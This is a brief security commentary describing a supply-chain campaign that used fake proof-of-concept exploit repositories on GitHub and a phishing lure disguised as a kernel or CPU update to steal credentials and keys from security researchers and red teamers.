Targeting red-teamers and security researchers through fake POCs is a troll technique as old as security research itself. However, as this attack demonstrates, it can also be an effective approach to watering-hole attacks. This is a good reminder for those who provide offensive security services that they themselves are part of an exploitable supply chain, and that malicious attackers know this.
Attackers set up dozens of GitHub repositories with fake proof-of-concept exploits. Victims who were security pros, red teamers and threat actors unknowingly installed malicious second-stage payloads that stole credentials and keys. Simultaneously, a phishing campaign tricked targets into installing a fake kernel update. These trojanized repos looked legitimate, often appearing in trusted threat intelligence feeds. By downloading and running this code, victims essentially infected themselves.
The attack used multiple methods to compromise victims. Trojanized GitHub repositories containing malicious code posed as legitimate proof-of-concept exploits, luring security professionals to download and run them. A phishing campaign also tricked targets into installing malware disguised as a CPU update, widening the attack surface.
This supply chain attack compromised the normal software acquisition process. Instead of attacking targets directly, the attackers poisoned the sources victims relied on to obtain tools and exploits.
Collection
[
|
...
]